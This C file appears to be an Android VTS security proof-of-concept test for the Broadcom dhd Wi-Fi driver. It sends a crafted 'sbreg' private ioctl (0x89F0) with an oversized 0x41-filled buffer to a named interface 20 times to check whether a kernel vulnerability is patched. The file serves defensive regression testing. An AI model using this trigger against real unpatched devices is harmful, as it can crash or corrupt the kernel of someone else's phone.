1 /* 2 * Copyright (C) 2016 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 17 #include "poc_test.h" 18 19 #include <dlfcn.h> 20 #include <errno.h> 21 #include <fcntl.h> 22 #include <net/if.h> 23 #include <sys/socket.h> 24 #include <linux/fb.h> 25 #include <linux/wireless.h> 26 #include <signal.h> 27 #include <stdint.h> 28 #include <stdio.h> 29 #include <stdlib.h> 30 #include <sys/ioctl.h> 31 #include <sys/mman.h> 32 #include <sys/prctl.h> 33 #include <sys/ptrace.h> 34 #include <sys/stat.h> 35 #include <sys/syscall.h> 36 #include <sys/types.h> 37 #include <sys/wait.h> 38 #include <unistd.h> 39 40 #define BUF_LEN 8192 41 #define IOC_BUF_LEN 63 42 #define TEST_CNT 20 43 44 typedef struct _android_wifi_priv_cmd { 45 char *buf; 46 int used_len; 47 int total_len; 48 } android_wifi_priv_cmd; 49 50 typedef struct sdreg { 51 int func; 52 int offset; 53 int value; 54 } sdreg_t; 55 56 typedef struct dhd_ioctl { 57 uint cmd; /* common ioctl definition */ 58 void *buf; /* pointer to user buffer */ 59 uint len; /* length of user buffer */ 60 unsigned char set; /* get or set request (optional) */ 61 uint used; /* bytes read or written (optional) */ 62 uint needed; /* bytes needed (optional) */ 63 uint driver; /* to identify target driver */ 64 } dhd_ioctl_t; 65 66 int poc(const char *ifname) { 67 int fd, i, res; 68 dhd_ioctl_t ioc; 69 struct ifreq arg; 70 struct iwreq data; 71 struct sdreg *s; 72 android_wifi_priv_cmd priv_cmd; 73 char buf[BUF_LEN]; 74 char iocbuf[IOC_BUF_LEN]; 75 76 fd = socket(AF_INET, SOCK_STREAM, 0); 77 if (fd < 0) { 78 printf("open socket error : fd:0x%x %s \n", fd, strerror(errno)); 79 return POC_TEST_FAIL; 80 } 81 memcpy(arg.ifr_ifrn.ifrn_name, ifname, strlen(ifname)); 82 83 memset(iocbuf, 0x41, IOC_BUF_LEN); 84 memcpy(iocbuf, ":sbreg\0", 7); 85 86 s = (struct sdreg *)&(iocbuf[7]); 87 s->func = 1; 88 ioc.len = IOC_BUF_LEN; 89 ioc.buf = iocbuf; 90 ioc.driver = 0x00444944; 91 ioc.cmd = 0x2; 92 93 arg.ifr_data = &ioc; 94 95 for (i = 0; i < 1; i++) { 96 if ((res = ioctl(fd, 0x89F0, (struct ifreq *)&arg)) < 0) { 97 printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno)); 98 } 99 sleep(1); 100 } 101 close(fd); 102 return POC_TEST_PASS; 103 } 104 105 int main(int argc, char **argv) { 106 VtsHostInput host_input = ParseVtsHostFlags(argc, argv); 107 const char *ifname = host_input.params["ifname"].c_str(); 108 if (strlen(ifname) == 0) { 109 fprintf(stderr, "ifname parameter is empty.\n"); 110 return POC_TEST_FAIL; 111 } 112 113 int i, ret; 114 115 for (i = 0; i < TEST_CNT; i++) { 116 if ((ret = poc(ifname)) != POC_TEST_PASS) break; 117 } 118 119 return ret; 120 } 121